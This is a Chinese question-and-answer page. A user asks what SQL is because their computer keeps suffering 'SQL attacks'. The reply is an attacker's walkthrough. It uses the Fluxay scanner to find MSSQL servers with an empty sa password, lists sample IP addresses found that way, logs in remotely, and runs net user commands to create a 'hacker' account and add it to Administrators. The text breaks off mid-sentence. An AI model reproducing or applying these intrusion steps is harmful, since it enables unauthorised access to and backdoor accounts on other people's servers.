什么是SQL啊

来源:百度知道 编辑:UC知道 时间:2024/06/05 01:29:28
我的电脑总被SQL攻击,这是什么啊

在黑客攻击的手段中!运用u漏洞和c进行攻击比较常见!但经过我的实践!运用SQL远程登录结合ipc$是最有效和最简单的攻击方法!一旦扫到支持远程登录的SQL主机!并且sa密码为空!那他有80%的可能死定了!
其实用sql攻击大部分时间是用在扫描上!运用的工具是小榕的流光!快捷键ctrl+r搜索!
选择aql!输入开始和结束的IP!扫描吧!然后可以到聊天室和MM聊天~!到搜索结束!察看流光最下面的视图!格式如下:
用户名 密码 地址
sa <null> 211.21.220.28
sa <null> 211.21.220.26
sa <null> 211.21.220.197
其中《null》表示密码为空!
双击其中一项(或在工具……>SQL登录)!会弹出一个dos窗口!如果过一会该窗口消失!没戏了!对方不支持远程登录!在换一个!如果过一会出现如下的字样:
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas!
Connect to 211.21.220.28 MSSQL Server Success, Type Command in Prompt.
SQLCmd>
那表示已经登录上了对方的主机!然后
SQLCmd>net user ‘察看用户!如果不能察看,说明sa权限不够,那也没戏,换其他的方法!或是走人!有时用net user察看成功!再试试
SQLCmd>net user administrator ’察看Admin的情况(可知是否在线)如果失败,撤退吧,
没戏,换方法!
下一步:
SQLCmd>net user hacker password /add '添加一给名为hacker,密码为passwod的用户!
SQLCmd>net localgroup administrators hacker /add ' 把刚才创建的用户加入
Admnistrators